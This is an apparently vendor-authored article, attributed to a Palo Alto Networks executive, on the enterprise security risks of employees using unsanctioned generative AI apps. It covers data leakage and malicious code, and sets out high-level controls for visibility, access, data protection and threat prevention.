Adopting unsanctioned GenAI applications can lead to a broad range of cybersecurity issues, from data leakage to malware. That's because companies don't know who is using what apps, what sensitive information is going into them, and what's happening to it once it's there. And because not all applications are built to suitable enterprise standards for security, they can also serve malicious links, which are hyperlinks that lead to a website or file containing harmful software, and act as entryways for attackers to infiltrate a company's network—giving them access to the systems and data. All of these issues can lead to regulatory compliance violations, sensitive data exposure, IP theft, operational disruption and financial losses. While these apps provide enormous productivity potential, there are serious risks and potential consequences associated with their adoption if not done securely.
We have Anand Oswal, SVP & GM of Network Security, Palo Alto Networks, talking on this important subject matter -
• Marketing teams using an unsanctioned application that uses AI to generate fantastic image and video content. What happens if the team loads sensitive information into the app and the details of your confidential product launch leak? Not the kind of "viral" you were looking for.
• Project managers using AI-powered note-taking apps to transcribe meetings and provide valuable summaries. But what happens when the notes captured include a confidential discussion about this quarter's financial results ahead of the earnings announcement?
• Developers using copilots and code optimization services to build products faster. But what if optimized code returned from a compromised application includes malicious scripts?
These are just a few ways that well-intentioned use of GenAI results in an unintentional increase in risk. However, blocking these technologies may limit your organization's ability to gain a competitive edge. The key is to empower your employees to use these applications securely, thereby leveraging their potential for innovation and productivity. Here are a few considerations:
Visibility: You can't protect what you don't know about. One of the biggest challenges IT teams face with unsanctioned apps is that it's difficult to respond to security incidents promptly, increasing the potential for security breaches. Every enterprise must monitor the use of third-party GenAI apps and understand the specific risks associated with each tool. Building on understanding which tools are being used, IT teams need visibility into what data flows in and out of corporate systems. This visibility will also help detect a security breach so it can be identified and rectified quickly.
Control: IT teams need to be able to make an informed decision on whether to block, allow, or limit access to third-party GenAI apps on either a per-application basis or leveraging risk-based or categorical controls. For example, you should block all employees' access to code optimization tools but allow developers to access the third-party optimization tool that your information security team has assessed and sanctioned for internal use.
Data Security: Ensuring the security of your data is paramount. Are your teams sharing sensitive data with the apps?
IT teams need to block sensitive data from leaking to protect your data against misuse and theft. This is especially important if your company is regulated or subject to data sovereignty laws. In practice, this means monitoring the data being sent to GenAI apps and then leveraging technical controls to ensure that sensitive or protected data, such as personally identifiable information or intellectual property, isn't sent to these applications.
Threat prevention: The potential for exploits and vulnerabilities can lurk underneath the GenAI tools used by your teams. Given the incredibly fast rate at which many of these tools have been developed and brought to market, you often don't know whether the model being used was built with corrupt models, trained on incorrect or malicious data, or is subject to a broad range of AI-specific vulnerabilities. It is a recommended best practice to be proactive in monitoring and controlling data flowing from the applications to your organization for malicious or suspicious activity.
Comments